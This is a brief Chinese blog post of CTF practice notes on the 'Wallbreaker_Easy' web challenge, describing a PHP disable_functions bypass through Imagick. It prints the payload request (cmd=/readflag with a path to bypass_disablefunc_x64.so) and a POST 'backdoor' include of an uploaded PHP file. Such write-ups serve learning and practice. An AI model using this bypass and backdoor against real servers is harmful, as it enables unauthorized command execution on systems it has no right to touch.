刷题笔记:Wallbreaker_Easy

Web

发布日期: 2021-09-27

更新日期: 2022-01-28

文章字数: 90

阅读时长: 1 分

前言

关键字:[disable_function|Imagick]

题解

提示可以说是十分明显了，利用imagick去disable_function bypass

见disable_functions bypass

用imagick函数，

在open_basedir处上传文件

然后

?cmd=/readflag&outpath=/tmp/d0d3c007f47b85e47c312ef8e20c88e6/xx&sopath=/tmp/d0d3c007f47b85e47c312ef8e20c88e6/bypass_disablefunc_x64.so

POST:backdoor=include('/tmp/d0d3c007f47b85e47c312ef8e20c88e6/1.php');

站在巨人的肩膀上就是轻松鸭。

巡璃

https://syunaht.com/p/1536130113.html

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源巡璃 !

CTF Web disable_function

刷题笔记:[MRCTF2020]Ezpop_Revenge

2021-09-27 Web

CTF Web PHP代码审计 SSRF

刷题笔记:[NPUCTF2020]web狗

2021-09-27 Web

CTF Web